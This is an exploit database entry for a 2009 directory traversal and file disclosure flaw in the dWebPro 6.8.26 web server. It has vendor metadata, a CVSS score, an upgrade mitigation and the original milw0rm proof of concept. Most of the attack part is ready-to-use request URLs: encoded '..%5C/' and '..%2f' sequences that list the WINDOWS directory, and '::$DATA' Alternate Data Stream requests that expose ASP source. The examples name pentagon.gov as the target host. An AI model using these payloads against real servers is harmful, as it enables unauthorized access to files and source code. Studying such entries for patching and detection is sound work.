dWebPro v 6.8.26 Remote Directory Tarvelsal & Remote File Disclosure p0c's

vendor:

dWebPro

by:

Alfons Luja

7,5

CVSS

HIGH

Directory Travelsal & File Disclosure

CWE

Product Name: dWebPro

Affected Version From: 6.8.26

Affected Version To: 6.8.26

Patch Exists: YES

Related CWE: N/A

CPE: a:dwebpro:dwebpro:6.8.26

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win32 xp home

2009

dWebPro v 6.8.26 Remote Directory Tarvelsal & Remote File Disclosure p0c’s

dWebPro v 6.8.26 is vulnerable to Directory Travelsal & File Disclosure. Directory Travelsal can be exploited by using '..%5C/' or '..%2f' in the URL. File Disclosure can be exploited by using Alternative Data Streams in the URL.

Mitigation:

Upgrade to the latest version of dWebPro.

Source

Exploit-DB raw data:

############################################
       dWebPro v 6.8.26
============================================
   Remote Directory Tarvelsal  && 
   Remote File Disclosure p0c's
============================================
   Download : http://www.dwebpro.com/downloads/dwebpro_6.8.26.exe
============================================
   Autor : Alfons Luja
   Tested on Win32 xp home 
############################################

   poc 1 Directory Travelsal : we can list directory
   
   http://www.penatgon.gov:8080/..%5C/www/..%5C/www/..%5C/..%5C/..%5C/WINDOWS/
   http://www.pentagon.gov:8080/..%2f..%2f..%2fWINDOWS%2f

   poc 2 File Disclosure : we can disclosure any file in a DOCUMENT_ROOT directory 
         by using Alternative Data Streams
   
   http://www.pentagon.gov:8080/..\/www/500-100-js.asp::$DATA
   http://www.pentagon.gov:8080/demos/aspclassic/asp_registry.asp::$DATA

+++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2009-04-27]